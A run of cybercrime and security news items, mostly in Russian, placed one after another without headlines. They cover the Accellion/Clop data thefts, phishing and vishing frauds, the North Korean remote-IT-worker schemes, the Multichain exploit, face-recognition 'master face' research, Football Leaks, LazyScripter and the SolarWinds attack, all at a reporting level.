"UC has learned that it, along with other universities, government agencies, and private companies throughout the country, was recently subject to a cybersecurity attack," a [statement](https://www.ucdavis.edu/news/uc-among- targets-nationwide-cyberattack) issued by the UC Office of the President reads.
"The attack involves the use of Accellion, a vendor used by many organizations for secure file transfer, in which an unauthorized individual appears to have copied and transferred UC files by exploiting a vulnerability in Accellion's file-transfer service."
Since February, the ransomware operation has been leaking files stolen after compromising vulnerable Accellion FTA file-sharing servers.
The ransomware gang started leaking the universities' data during late March, attempting to coerce them to pay ransoms to have the stolen data deleted and the leaks stopped.
Last month, the Clop ransomware gang leaked other data sets allegedly stolen from the University of Colorado and the University of Miami.
The attackers haven't gained access to universities' internal networks, with the incident only impacting their Accellion servers.
Clop leak site
While still unclear if Clop is behind these Accellion attacks or they're collaborating with another group, a joint statement from Mandiant and Accellion shed more light on these attacks also linking them to a second operation, the FIN11 cybercrime group.
BleepingComputer has reported multiple data breaches affecting companies and organizations after these threat actors successfully compromised their Accellion FTA servers and exfiltrated sensitive information.
Starting with January, we reported attacks on energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, the Reserve Bank of New Zealand, Singtel, the Australian Securities and Investments Commission (ASIC), the Office of the Washington State Auditor ("SAO"), as well as multiple universities and other organizations.
Five Eyes members also issued a joint security advisory in February about ongoing attacks and extortion attempts targeting orgs that use vulnerable Accellion File Transfer Appliance (FTA) versions.
In related news, Brown University, a private Ivy League research university, is still working on bringing systems online after it had to disable them following a cyberattack on Tuesday.
Павлоградский горрайонный суд Днепропетровской области приговорил к штрафу украинца за распространение вредоносного программного обеспечения.
Во время судебного заседания стало известно, что в июле 2019 года у жителя Павлограда возник преступный умысел на сбыт вредоносного программного обеспечения, предназначенного для несанкционированного вмешательства в работу компьютерных сетей. Для этого мужчина опубликовал в сети Интернет объявление, на которое в сентябре 2019 года откликнулся житель Днепра, с которым преступник договорился о сбыте устройства BlueWay BT-N9100 и программного обеспечения к нему, предназначенного для взлома wi-fi сетей. После получения оплаты в размере 420 гривен на банковскую карточку «Приватбанка», мужчина отправил вышеуказанное устройство заказчику в одно из отделений «Новой Почты» в г. Днепр.
Действия подсудимого были квалифицированы по ч. 1 ст. 361-1 УК Украины, как сбыт вредоносного программного обеспечения, предназначенного для несанкционированного вмешательства в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи.
На основании ст. 65 УК Украины, учитывая тяжесть преступления, личность обвиняемого, а именно то, что обвиняемый совершил нетяжкое преступление, ранее не судим, признал свою вину полностью, в содеянном раскаялся, суд посчитал, что наказание обвиняемому следует назначить в виде штрафа в размере 500 необлагаемых минимумов доходов граждан,что составляет 8500 гривен.
Также подсудимый должен оплатить сумму 6671 грн. 70 коп в счет возмещения процессуальных издержек.
Сотрудниками ГУУР МВД России совместно с коллегами УМВД России по Сахалинской области на территории Луганской Народной Республики пресечена преступная деятельность 21-летнего жителя Луганска, который подозревается в дистанционных кражах денежных средств с банковских счетов граждан.
Полицейскими установлено, что мужчина стал участником некоего криминального проекта, целью которого было похищение чужих денег. В одном из мессенджеров он прошёл специальное «обучение», после чего под руководством сообщников приступил к поиску потенциальных жертв.
Он находил в Интернете объявления, преимущественно жителей Сахалина, о продаже разного имущества. Затем, выдавая себя за покупателя, договаривался с продавцом о покупке, при этом убеждал его отправить товар транспортной компанией.
Если человек соглашался, злоумышленник сообщал ему, что уже оформил и оплатил доставку. Однако чтобы деньги поступили на счёт грузоперевозчика, продавец должен был ввести данные своей банковской карты на сайте транспортной компании, чтобы якобы подтвердить перевод.
Затем житель Луганска отправлял потерпевшим ссылки на поддельные сайты, которые ему предоставляли кураторы из проекта. Когда введённые в заблуждение граждане вводили реквизиты своих карт, с их счёта списывалась определённая сумма.
В некоторых случаях одних и тех же граждан задержанный обманывал дважды. Он сообщал им, что транспортная компания по ошибке списала у них деньги, и чтобы их вернуть, просил вновь ввести реквизиты карты. После этого со счетов потерпевших опять исчезали финансы.
Оперативниками установлена причастность мужчины к совершению в период с ноября 2021 года по декабрь 2022 года 29 преступлений в отношении жителей Сахалинской области. Сумма ущерба составила 425 тысяч рублей.
По версии полиции, часть похищенных денежных средств злоумышленник отправлял сообщникам, остальное тратил на собственные нужды.
В настоящее время жителю Луганска предъявлено обвинение в совершении преступлений, предусмотренных п. «а» ч. 4 ст. 158 Уголовного кодекса Российской Федерации. В отношении него избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
В децентрализованном протоколе Multichain была обнаружена уязвимость и, хотя разработчики оперативно устранили проблему, средства пользователей остаются под угрозой.
Как [сообщила](https://medium.com/multichainorg/action-required-critical- vulnerability-for-six-tokens-6b3cbd22bfc0) компания PeckShield, работающая в области безопасности блокчейна, несмотря на исправление уязвимости, пользователям необходимо отозвать разрешение на работу с протоколом в своих кошельках. Далеко не все пользователи сделали это оперативно, что позволило хакерам украсть криптоактивы на $1.34 млн.
«Кто-то использует уязвимость прямо сейчас. Если вы не отозвали разрешения на работу, то я бы посоветовал вам сделать это, пока еще не поздно», – написал сотрудник компании Paradigm под псевдонимом Samczsun.
Взлом подтвердили и разработчики самого протокола Multichain. Они сообщили, что злоумышленники смогли вывести 445 токенов WETH. При этом уязвимость касается шести токенов в пулах Multichain – WETH, PERI, OMT, WBNB, MATIC, AVAX.
Отметим, что Multichain – крупнейший протокол для обмена активов между блокчейнами. Сейчас в пулах проекта заблокировано более $8.3 млрд. Multichain работает с десятью блокчейнами и поддерживает 1 366 токенов. В конце декабря разработчики протокола получили финансирование на сумму $60 млн.
Ученые из Тель-Авивского университета в Израиле разработали способ обойти системы биометрической идентификации с помощью поддельного снимка лица.
Обнаруженный метод использует технологии искусственного интеллекта для создания универсального лицевого шаблона, который может последовательно объединить и разблокировать системы проверки личностей.
По словам исследователей, уязвимость заключается в том, что распознавание лиц использует широкий набор маркеров для идентификации конкретных людей. С их помощью можно создать универсальный шаблон, способный обмануть большой процент систем безопасности.
Ученые предположили, что всего 9 лиц, сгенерированных с помощью алгоритма StyleGAN, смогут соответствовать 40% населения Земли. Они протестировали синтезированный нейросетью снимок на наборе данных из 13 000 изображений и выяснили, что фейковое лицо может имитировать 20% личностей из датасета. Другие тесты показали более высокие результаты.
«Аутентификация по лицу чрезвычайно уязвима, даже если у злоумышленников нет информации о целевой личности», — сообщили исследователи.
Ученые также считают, что уязвимость может сочетаться с дипфейками для имитации проверки «живости», которую часто применяют для удаленного подтверждения личности с помощью выполнения ряда жестов.
• Source: https://arxiv.org/pdf/2108.01077.pdf
Московский житель, переживающий период безработицы, пережил сложное испытание, отправив около восьми миллионов рублей тем, кого считал друзьями. Беззаботный Алексей, попавший в ловушку обмана, в течение трех месяцев активно перечислял деньги женщинам, знакомым с ним через интернет-платформу, специализирующуюся на знакомствах.
Начав общение с одной из пользователек по имени Кира, с которой быстро достиг договорённости о совместном сексе и нюдсах за символическую плату, Алексей вскоре перешел к общению с остальными подругами предполагаемой знакомой. Все они коварно втягивали его в ловушку, суля выманиваемые средства в обмен на обещания неопределенных услуг, однако обещанных "тройничков" он так и не увидел.
Происшествие, послужившее кульминацией этой истории, наступило, когда одна из обманутых женщин, ее мать и ее подруга внезапно заболели раком. Алексей, уже убежденный в серьезности ситуации, без колебаний выделил крупные суммы на лечение и поддержку. Именно этот момент выделился в его памяти, отмеченный общим переводом около 8 миллионов за тот, вскоре оказавшийся несправедливый период.
Сомнения начали накапливаться у Алексея, когда его внимание привлекла неожиданная ситуация с одной из женщин, якобы попавшей в хоспис. Под предлогом помощи девушка предоставила ему номер телефона одного из добровольцев, что сподвигло Алексея обратиться в правоохранительные органы. В результате расследования, запущенного полицией, ему стало ясно, что стал жертвой хитрых мошенников, действовавших в грязном виртуальном мире.
Недавно Министерство юстиции США предъявило обвинения жителю Нэшвилла, Мэтью Айзеку Кнуту, за его участие в схеме, организованной Северной Кореей для незаконного получения удалённой работы в IT-сфере. Деятельность Кнута позволила северокорейским операторам выдавать себя за граждан США и работать в американских и британских компаниях.
По данным обвинительного заключения, 38-летний Кнут сыграл ключевую роль в многолетнем заговоре, благодаря которому IT-специалисты из Северной Кореи смогли получить удалённые рабочие места, притворяясь жителями США. Эти работники, находившиеся преимущественно в Китае, получали доступ к системам компаний, используя украденные американские личности.
Кнут способствовал этой обманной схеме, размещая ноутбуки, предоставленные компаниями, у себя дома в Нэшвилле. Он устанавливал на них несанкционированное программное обеспечение для удалённого доступа, что позволяло операторам работать из-за границы, создавая впечатление, что они находятся в США.
Расследование Министерства юстиции показало, что «ферма ноутбуков» Кнута функционировала с июля 2022 года по август 2023 года. В этот период северокорейские IT-работники заработали более 250 000 долларов каждый. Эти средства были переведены на счета, связанные с северокорейскими и китайскими агентами.
Полученные таким путём доходы напрямую способствовали финансированию запрещённых программ по созданию оружия массового уничтожения в Северной Корее. Действия Кнута нанесли компаниям ущерб на сумму свыше 500 000 долларов, в основном за счёт расходов на аудит и восстановление систем.
Помощник генерального прокурора Мэтью Г. Олсен подчеркнул значительные угрозы национальной безопасности, связанные с этой схемой, и предупредил американские компании о растущей опасности, исходящей от Северной Кореи. Он также напомнил о необходимости усилить меры предосторожности при найме сотрудников. Эти обвинения последовали после запуска в марте этого года инициативы «DPRK RevGen: Domestic Enabler Initiative», направленной на выявление и ликвидацию операций, подобных «ферме ноутбуков» Кнута.
Кнуту предъявлены многочисленные обвинения, включая заговор с целью причинения ущерба защищённым компьютерам, отмывание денег, мошенничество с использованием электронных средств связи и кражу личных данных. В случае признания виновным ему грозит до 20 лет тюремного заключения, с обязательным минимумом в два года за кражу личных данных.
Этот случай является частью широкой схемы киберпреступлений, проводимых Северной Кореей против американских компаний. В прошлом месяце компания по кибербезопасности KnowBe4 предотвратила попытку северокорейского хакера проникнуть в её IT-системы, когда он выдавал себя за инженера-программиста, успешно пройдя все этапы проверки, включая видеособеседования и проверку биографических данных.
Мошенничество было обнаружено, когда Центр безопасности компании KnowBe4 выявил подозрительную активность на рабочем месте нового сотрудника, который получил оборудование на адрес, связанный с сетью «ферм ноутбуков», аналогичных той, что управлялась Кнутом.
Растущая сложность операций северокорейских киберпреступников, продемонстрированная как в случае с Кнутом, так и в инциденте с KnowBe4, подчёркивает необходимость усиления мер безопасности в американских компаниях. В том числе рекомендуется проводить более тщательную проверку биографических данных, подтверждать физическое местоположение удалённых сотрудников и внимательно следить за несоответствиями в адресах доставки и месте проживания.
• Source: https://www.justice[.]gov/usao-mdtn/pr/department-disrupts-north- korean-remote-it-worker-fraud-schemes-through-charges-and
Бывшие агенты ЦРУ рассказали, как Северная Корея нашла источники дохода на Западе
Американская технологическая компания Cinder столкнулась с необычной проблемой — в их базе кандидатов на вакансии оказались северокорейские инженеры, которые, как предполагается, работают в интересах правительства КНДР.
Подобные случаи становятся всё более распространенными среди американских компаний, которые нанимают сотрудников для удаленной работы. Северокорейские инженеры, находясь, например, в Китае, пытаются получить должности на удаленке в американских компаниях, чтобы зарабатывать деньги для КНДР, работая под чужими именами.
Cinder отмечает, что Северная Корея давно отправляет своих граждан за границу для заработка средств, которые затем поступают в казну государства. Такие работники обязаны выполнять квоты по заработной плате, значительная часть которой идет в распоряжение правительства. Для предотвращения побегов, семьи сотрудников остаются в Северной Корее в качестве «заложников».
Ситуация обострилась после пандемии COVID-19, когда резко выросло количество вакансий с удаленной работой, особенно в технологической отрасли. Многих инженеров из КНДР привлекают высокие зарплаты в США, которые могут в несколько раз превышать их ежемесячные квоты. Бывший северокорейский бизнесмен Хён-Сын Ли рассказал, что квота для IT-работника из КНДР, работающего в Китае, составляет около $6000 в месяц, и многие компании в США могут легко покрыть эту сумму.
Cinder, основатели которой являются бывшими сотрудниками ЦРУ, смогла быстро распознать и нейтрализовать угрозу. Руководители Cinder ранее работали над вопросами кибербезопасности и прав человека в Северной Корее, что помогло им быстро идентифицировать подозрительных кандидатов.
Один из основателей Cinder отметил, что работа в ЦРУ помогла компании распознать методы работы северокорейских специалистов. Кандидаты, подозреваемые в работе на КНДР, часто не имели присутствия в интернете за пределами корпоративных сетей, использовали недавно созданные профили и измененные (или сгенерированные ИИ) фотографии, а также плохо ориентировались в технологиях и локациях, которые указывали в своем резюме. Кроме того, такие кандидаты проявляли сильное нежелание к командировкам и придерживались заранее подготовленных ответов на вопросы.
Cinder начала более тщательно проверять кандидатов, используя дополнительные методы анализа их истории работы, профилей в социальных сетях и поведения на собеседованиях. Несмотря на это, иногда подозрительные кандидаты всё же доходили до этапа интервью, где их обманы удавалось раскрыть в процессе общения. В одном из таких случаев кандидат, узнав, что клиенты Cinder занимаются расследованиями государственного шпионажа, мгновенно прервал звонок в Zoom и больше не выходил на связь.
В настоящее время Cinder продолжает получать заявки от северокорейских инженеров и активно делится информацией с партнерами из сферы безопасности и рекрутинга. Компании рекомендуют внимательно проверять кандидатов, особенно тех, кто настаивает на полностью удаленной работе, чтобы избежать нежелательного сотрудничества.
Напомним, что в начале августа в США был арестован 38-летний Мэттью Айзек Кнут по обвинению в помощи северокорейским IT-специалистам в получении удаленной работы в американских компаниях. Арестованный создавал условия, чтобы специалисты из Северной Кореи, используя поддельные данные, выдавали себя за граждан США. Кнут организовал так называемую «ферму ноутбуков» — он получал компьютеры, отправленные на имя вымышленного гражданина, устанавливал на ноутбуки программы для удаленного доступа и позволял северокорейским хакерам работать из Китая, создавая иллюзию присутствия в США.
• Source: <https://www.cinder.co/blog-posts/north-korean-engineers-in-our- application-pile>
Полицейские разоблачили преступную организацию, которая реализовала масштабную схему завладения средствами граждан с использованием «вишинга» и «спуфинга». Задокументировано около 100 эпизодов преступной деятельности фигурантов, где потерпевших обманули на 2,5 млн долл.
Пресекли преступную деятельность мошенников следователи Главного следственного управления и оперативники Департамента уголовного розыска Нацполиции, под процессуальным руководством Офиса Генерального прокурора и при поддержке Европола и Евроюста в рамках международного сотрудничества с правоохранительными органами Чешской Республики.
Вводя в заблуждение потерпевших о взломе их банковских счетов и необходимости перевести средства на безопасные счета или приобрести криптовалюту, фигуранты присвоили более 2,5 миллиона долларов. Полицейские задержали двух граждан Чехии и двух гражданин Молдовы, которые входили в состав группировки.
По материалам следствия, к организации масштабной международной мошеннической схемы причастны также граждане Украины, которые совместно с представителями других государств, в частности Чешской Республики, Республики Молдовы, Республики Казахстана, обеспечивали работу колл-центров в Днепропетровской, Кировоградской и Киевской областях.
Оперативники криминальной полиции установили, что колл-центр, который действовал с 2023 года, организовал житель Днепра. Он вместе с соорганизатором мошеннической схемы привлек к преступной деятельности жителей нескольких областей Украины и иностранцев, которые владели чешским языком.
Работники колл-центра звонили пострадавшим под видом банковских работников и сообщали о взломе банковских счетов. Потерпевшим предлагали временно перевести средства на другие «безопасные банковские счета» или предлагали приобрести биткоины по выгодному курсу.
Во время звонков мошенники использовали так называемую замену телефонного номера, то есть имитировали любой телефонный номер, который им нужен, в результате чего у пострадавших складывалось впечатление, что им звонят из службы поддержки банка.
В ходе расследования полицейские задокументировали около 100 эпизодов преступной деятельности группировки, в результате которых гражданам нанесен более 2,5 миллиона долларов убытков.
Правоохранители провели 21 обыск по местам проживания фигурантов, в их транспортных средствах и в колл-центре. Во время обысков изъяли более 68 тысяч долларов, деньги в евро и гривнах и другие вещественные доказательства преступной деятельности.
Полицейские задержали граждан Чешской Республики и Республики Молдова в порядке статьи 582 Уголовного процессуального кодекса Украины «Особенности задержания лица, совершившего уголовное правонарушение за пределами Украины».
Задержанным была избрана мера пресечения в виде экстрадиционного ареста. 23 сентября 2024 года злоумышленники были переданы в правоохранительные органы Чешской республики.
Следователи Нацполиции проводят расследование преступной деятельности группировки в рамках уголовного производства по ч. 5 ст. 190 Уголовного кодекса Украины (Мошенничество, совершенное в особо крупных размерах или организованной группой). Санкция статьи предусматривает наказание - до 12 лет лишения свободы с конфискацией имущества.
Документирование преступной деятельности фигурантов осуществляет созданная совместная международная следственная группа.
• Source: https://www.npu.gov[.]ua/news/natspolitsiia-spilno-z-cheskymy- pravookhorontsiamy-likviduvala-diialnist-mizhnarodnoho-shakhraiskoho-kol- tsentru-ta-ekstraduvala-inozemtsiv
Павел Дуров сообщил, что Telegram с 2018 году может раскрывать властям IP-адреса и номера телефонов преступников в большинстве стран. Поэтому, по словам Дурова, политика конфиденциальности существенного не поменялась, как [многие думали](https://www.iphones.ru/iNotes/telegram- obyavil-chto-budet-slivat-specsluzhbam-ip-adresa-i-telefony-vseh-kto- narushaet-pravila-messendzhera-i-zakony-stran).
Данные выдаются только при получении «правильно оформленного юридического запроса». После чего мессенджер его проверяет и решает, можно ли делиться информацией.
С начала 2024 года Telegram не передавал IP-адреса и номера телефонов российским правоохранительным органам. Но в других странах мессенджер активно сотрудничает с властями. Например, в Бразилии Telegram ответил на 203 запроса в 2024 году, а в Индии — на 6992 запроса.
По данным полиции, Нурухусейн Хусейн (Nuruhussein Hussein) выследил и посадил в свой автомобиль двух жертв — одну в марте, а другую в октябре. Хусейн обращался к людям, которые стояли в ожидании такси, по именам. Однако в судебных документах не указано, откуда Хусейн знал имена жертв, заказавших такси в Uber.
В одном случае, после того как жертва оказалась в салоне, Хусейн пожаловался, что у него разрядился телефон, и просил устройство у пассажира. В другой раз, чтобы заполучить чужой телефон, преступник предложил жертве помочь устранить неполадки в приложении Uber, которое сообщало, что их водитель не приехал.
Заполучив телефоны пассажиров, мужчина смог перевести с принадлежащих им счетов на бирже Coinbase (NASDAQ:COIN) криптоактивы на сумму более $223 000. Когда пострадавшие просили Хусейна вернуть им телефоны, преступник пускал в ход угрозы.
Прокуратура настаивает на дистанционном надзоре за обвиняемым, а также потребовала запретить ему использовать Интернет. Учитывая, что Хусейн смог осуществить сложную мошенническую схему с использованием электронных средств связи, правоохранители предполагают, что мужчина может уничтожить потенциальные доказательства его вины.
Прокуратура также потребовала запретить Хусейну выезд из округа Марикопа, опасаясь его побега из страны — обвиняемый часто совершает поездки в Эфиопию. Чтобы получить освобождение, он должен заплатить залог $200 000 наличными. Следующее появление Хусейна в суде запланировано на конец декабря.
fox10phoenix.com/news/fake-uber-driver-allegedly-stole-thousands-crypto-from- customers
Руи Пинто: Хакер-разоблачитель или киберпреступник?
Хакер Руи Пинто, стоящий за скандальным проектом “Football Leaks”, был обвинен португальской прокуратурой в 377 преступлениях за доступ к компьютерным системам футбольных клубов, журналистов и судей, в том числе к адвокату Криштиану Роналду, откуда он получил информацию о жалобе на изнасилование против футболиста.
Ранее он сказал суду, что был «возмущен» тем, что увидел в документах, и что это побудило его опубликовать их в Интернете под названием «“Football Leaks».
Обвинительное заключение, вынесенное 4 июля и теперь опубликованное местными СМИ, говорит, что 202 преступления - это квалифицированный незаконный доступ, 134 - нарушение переписки, 23 - усугубленное нарушение переписки и 18 - повреждение компьютера.
Прокуратура утверждает, что Пинто незаконно получил доступ к электронной почте адвоката Роналду и передал немецкому журналу Der Spiegel информацию о жалобе на изнасилование против футболиста, поданной моделью. Роналду является одним из более чем 100 человек, вызванных в качестве свидетелей прокуратурой по этому делу.

Пинто также получил доступ к электронной почте Бенфики, которую он затем передал директору по связям с общественностью ФК Порту Франсиско Ж. Маркесу, уже осужденному в другом процессе за раскрытие электронных писем. Он также получил доступ к электронной почте Рио Аве, Лейшоэша, Морейренсе, Витории де Гимараеша, Лиги клубов, судей и прокуроров, Национальной сети внутренней безопасности, Налоговому управлению, журналистам группы Cofina и Универсальной церкви Царства Божьего.
Пинто уже проходил суд в другом процессе, связанном с "Football Leaks", где ему предъявили обвинения в 90 эпизодах компьютерных преступлений и вымогательстве. Решение по этому делу станет известно 13 июля.
Пинто считает себя не хакером, а разоблачителем коррупции в футбольном мире. Он также заявляет, что стоит за Luanda Leaks, набором из 715 тысяч электронных писем, контрактов, аудитов и других документов, которые объясняют, как Изабель дос Сантос - дочь покойного ангольского диктатора Жозе дос Сантос - построила бизнес-империю и стала самой богатой женщиной в Африке.
Руи Пинто утверждает, что его разоблачения в отношении Роналду привело к краху его карьеры в минорной лиге и переезд в страну, которая управляется режимом, нарушающим права человека.
«В течение нескольких месяцев произошло то, что никто не ожидал - наследие Криштиану Роналду сильно подпорчено.
Всё, что он сделал, это перебрался в Аравию с щедрым контрактом, став так
называемым "послом", пропагандистом тоталитарного режима, известного своим
жестоким подавлением прав человека, и прямым участником варварского убийства
Джамаля Хашогги», - говорит Пинто.
В чем обвиняли Пинто?
Пинто предстал перед судом за 89 хакерских преступлений. Среди его жертв были ведущий португальский футбольный клуб «Спортинг», инвестиционный фонд Doyen Sports, Федерация футбола Португалии, юридическая фирма и судьи португальской прокуратуры.
Он также был обвинен в попытке вымогательства, преступлении, наказуемом от двух до 10 лет лишения свободы.
34-летний хакер был арестован в Будапеште в 2019 году и экстрадирован обратно в Португалию, чтобы предстать перед судом в 2020 году.
Ранее он сказал суду, что был «возмущен» тем, что увидел в документах, и что
это побудило его опубликовать их в Интернете под названием «Футбольные
утечки».
Каким был выпуск «Football Leaks»?
«Футбольные утечки» — это кладезь из 18,6 миллионов документов, проливающих свет на сомнительные действия звезд футбола, их клубов и их агентов.
Пинто опубликовал файлы в Интернете в 2015 году, и впоследствии они были подхвачены несколькими европейскими новостными агентствами, в том числе немецким Der Spiegel .
Разоблачения привели к тому, что несколько клиентов португальского суперагента Хорхе Мендеса оказались под следствием по обвинению в уклонении от уплаты налогов, в том числе Криштиану Роналду, который в итоге заплатил несколько миллионов евро испанским налоговым органам в 2019 году.
Они также выявили жалобу на изнасилование, поданную против Роналду. Позже жалоба была отклонена судом американского штата Невада в 2022 году.
source:
marca.com/en/latest-news/2023/07/08/64a999bcca474110258b4593.html
dw.com/en/cristiano-ronaldo-us-judge-dismisses-las-vegas-rape-
lawsuit/a-62102311
Киберпреступники в Азии переключились с кражи кредитных карт на похищение корпоративных документов.
Количество украденных азиатских номеров кредитных карт, продаваемых в даркнете, резко снизилось, сообщила ИБ-компания Group-IB на конференции ATxSG в Сингапуре. Вместо этого злоумышленники в регионе усилили свои попытки украсть корпоративные документы, причем главной целью стала Индия.
Исследователи обнаружили, что преступники используют ботнеты для похищения 3 249 318 строк данных из индийских организаций в 2023 году, а также компрометации 413 корпоративных аккаунтов. Индонезия заняла второе место по количеству скомпрометированных документов – 1 950 951 с помощью ботнетов. Вьетнам оказался на втором месте по числу взломанных аккаунтов - 322.
Из 100 обнаруженных Group IB нарушений безопасности данных компаний АТР (Азиатско-Тихоокеанский Регион), которые привели к утечке более 81 млн. записей, 34 были из Индии и 22 из Индонезии. Тайвань занял третье место с 6 записями. Нарушения безопасности данных в АТР растут, показывая 27% годовой прирост.
Кроме того, из 29 млн. скомпрометированных аккаунтов, продаваемых в даркнете, более 12 млн. имели домены верхнего уровня, связанные с Индией. Индонезия заняла второе место с почти 4,4 млн. аккаунтов. Большая часть аккаунтов была предложена на сайте Russianmarketshop (85%) и получена с помощью Raccoon stealer (73%).
В Group IB отметили, что Индия, Индонезия и Вьетнам стали целями хакеров потому, что это большие страны и активные пользователи информационных технологий. Но это не значит, что другие страны не подвергаются атакам.
Индия не возглавляет список стран, где распространено вредоносное ПО от поставщика вредоносных оверлеев для Android InTheBox. В этой категории лидирует Австралия с 34 мобильными приложениями, за ней следует Индия с 33. Третье и четвертое места заняли Япония (23) и Сингапур (21).
InTheBox в основном способствует распространению банковских вредоносных программ, поэтому атака на более богатые страны, такие как Япония, Сингапур и Австралия, означает больше доходов для преступников.
Group IB обнаружила, что на теневых рынках в даркнете больше всего скомпрометированных корпоративных аккаунтов и кредитных карт, источником которых является Китай.
Также специалисты Group IB нашли дампы текстов и данных, содержащие более 213 000 кредитных карт АТР, выставленных на продажу в 2023 году. Это число в 10 раз меньше, чем количество карт за тот же период в 2022 году. Более 62 000 были австралийскими кредитными картами, а более 29 000 - китайскими.
Снижение количества продаваемых данных кредитных карт в даркнете при росте нарушений безопасности данных может быть интерпретировано как дальнейшее изменение бизнес-модели преступников - от атак на отдельных лиц к более прибыльным целям, таким как бизнес, правительства и другие субъекты.
В конце 2020 года эксперты компании Malwarebytes обнаружили хак-группу LazyScripter, активную с 2018 года и долгое время остававшуюся незамеченной. Сообщается, что эти злоумышленники атакуют авиакомпании, использующие программное обеспечение BSPLink, разработанное Международной ассоциацией воздушного транспорта (IATA).
Исследователи рассказывают, что атаки LazyScripter обычно начинаются с фишинга, мишенями которого становятся люди, собирающиеся иммигрировать в Канаду по работе, авиакомпании, а также IATA.
Обнаруженные вредоносные документы LazyScripter
Инфраструктура преступников по-прежнему активна, и группировка все время развивается, обновляя свой инструментарий. Так, в последнее время хакеры используют свободно доступную малварь Octopus и Koadic, которая обычно доставляется жертвам посредством вредоносных документов и ZIP-архивов, содержащих встроенные объекты (VBScript или пакетные файлы), а не макросы, как часто бывает во время подобных атак.
Эксперты обнаружили и другие примеры того, что LazyScripter используют для атак RAT, также применяемые другими хакерскими группами: LuminosityLink, RMS, Quasar, njRat и Remcos.
Фишинговые письма, изученные специалистами, использовали один и тот же загрузчик для Koadic и Octopus. Он получил название KOCTOPUS, а до него преступники пользовались Empoder, загрузчиком для PowerShell Empire.
Схема атаки
Эксперты отмечают, что ко всему прочему LazyScripter размещают свои наборы инструментов на GitHub, и такую тактику ранее использовала другая APT, связанная с Ираном. Всего удалось найти три аккаунта, связанных с LazyScripter: два из них (LIZySARA и Axella49) были удалены еще в январе текущего года, но третий (OB2021) появился в начале текущего месяца и продолжал работать еще на этой неделе, хотя после публикации отчета Malwarebytes был тоже удален.

Интересно, что некоторые фишинговые приманки преступников явно были ориентированы на авиакомпании, которые используют программное обеспечение BSPLink, разработанное IATA для составления планов выставления счетов и производства расчетов (BSP). Так, совсем недавно приманка хакеров в очередной изменилась и эксплуатирует тему новой функции, представленной IATA — IATA ONE ID (инструмент для бесконтактной обработки пассажиров).

В целом злоумышленники использую самые разные темы, для привлечения внимания жертв, начиная от COVID-19 и обновлений продуктов Microsoft, и заканчивая безопасностью IATA и канадскими визами. На схеме ниже можно увидеть, как менялись приманки группировки с течением лет.

В отчете исследователи Malwarebytes не делают никаких окончательных выводов относительно атрибуции LazyScripter. Так как группа в основном использует опенсорсные и широко распространенные инструменты, определить ее происхождение крайне трудно. Лишь две хак-группы ранее применяли пентестерский инструмент Koadic: связанная с Ираном MuddyWater и российская APT28 (она же Fancy Bear, Sofacy, Strontium, Sednit и так далее). Однако в данном случае эксперты не обнаружили прочных связей ни с одной из них, хотя косвенные улики все же говорят о сходстве с MuddyWater.
Источник: xakep.ru/2021/02/25/lazyscripter/
Researchers discovered credentials for the Oldsmar water treatment facility in
the massive compilation of data from breaches posted just days before the
attack.
Researchers say they found several stolen and leaked credentials for [a
Florida water-treatment plant,](https://threatpost.com/hacker-tries-to-poison-
water-supply-of-florida-town/163761/) which was hacked last week.
По мере того как законодатели и исследователи в области безопасности продолжают разоблачать взлом SolarWinds, некоторые разочаровываются в Amazon, утверждая, что гигант облачных вычислений должен быть более открытым для общественности в отношении своей информации о российской кибератаке.
По словам исследователей безопасности, системы были взломаны напрямую, но хакеры использовали огромные центры обработки данных облачных вычислений для запуска ключевой части атаки. Операция была названа одним из масштабных примеров кибершпионажа в истории США.
Хотя эксперты по кибербезопасности говорят, что практически невозможно остановить хакеров от неправильного использования облачных сервисов, как это могло бы случиться в этом случае. Они также заявили, что Amazon, использует важную информацию, которая может пролить свет на спектр атак и тактик, которые используются киберпреступниками. Официальные лица США заявляют, что злоумышленники являются агентами российской разведки.
Amazon в частном порядке поделилась этой информацией с правительством США, но, в отличие от других технологических компаний, не захотела ее обнародовать.
Во время слушаний сенатского комитета по разведке, некоторые представители выразили мнение, что компания должна дать официальные показания в суде по вопросам, относящимся к масштабной кибератаке. «Amazon должен дать показания - это должно быть добровольно, но комитет должен принять в этом деле участие. Мы многого не знаем о полном объеме этой атаки и не можем терять время, когда наши противники готовятся к следующим атакам» - заявил один из сенаторов.
«Проблема SolarWinds не влияет на AWS, и мы не используем их программное обеспечение», - говорится в заявлении представителя Amazon Web Services. «Когда мы узнали об этом событии, мы немедленно провели расследование, убедились, что не пострадали, и поделились тем, что узнали, с правоохранительными органами. Мы также предоставили подробную информацию правительственным чиновникам, включая членов Конгресса».
По словам исследователей безопасности, в центрах обработки данных Amazon размещались серверы, которые использовались на критическом этапе атаки SolarWinds - в то время, когда хакеры создавали плацдарм в сетях своих жертв и искали способы зондирования систем для получения дополнительной информации. По их словам, серверы Amazon использовались для размещения и доставки хакерских инструментов, которые в конечном итоге загружались на компьютеры жертв, а затем использовались для зондирования и проникновения в новые системы в этих сетях.
«Amazon обладает очень ценными или потенциально ценными данными», - сказал Джо Словик, старший исследователь безопасности в онлайн-аналитической компании DomainTools.
Компания, занимающаяся облачными вычислениями, может иметь финансовую информацию о том, как оплачивались ее услуги, данные сетевого трафика, показывающие, с кем хакеры SolarWinds взаимодействовали в Интернете, и данные, хранящиеся на самих серверах, показывающие, в какой другой деятельности были задействованы хакеры, а, возможно, и другие инструменты, которые они использовали, сказал Словик.
Amazon, как и все крупные технологические компании, использует команду «анализа угроз» для отслеживания и защиты себя и своих клиентов от известных хакерских групп.
Благодаря своему доминирующему положению на рынке, эти технологические компании все больше узнают об огромных объемах данных, которые часто полезны для расследования, обнаружения и устранения киберпреступников.
Облачный сервис Azure корпорации Microsoft также использовался хакерами, а его продукты Office 365 содержали сообщения электронной почты и внутренние документы, которые были основной целью атаки. Но Microsoft опубликовала технические подробности преступной деятельности, которые помогли следователям и компаниям определить, были ли они вовлечены в атаку.
В своем выступлении во вторник президент Microsoft Брэд Смит сказал, что на основе данных, полученных от его подразделения облачных вычислений, Microsoft проинформировала 60 клиентов о том, что они стали жертвами атаки SolarWinds. Представитель Amazon отказался сообщить, предоставляла ли компания аналогичную услугу, и не указал количество идентифицированных жертв атаки, если таковые были.
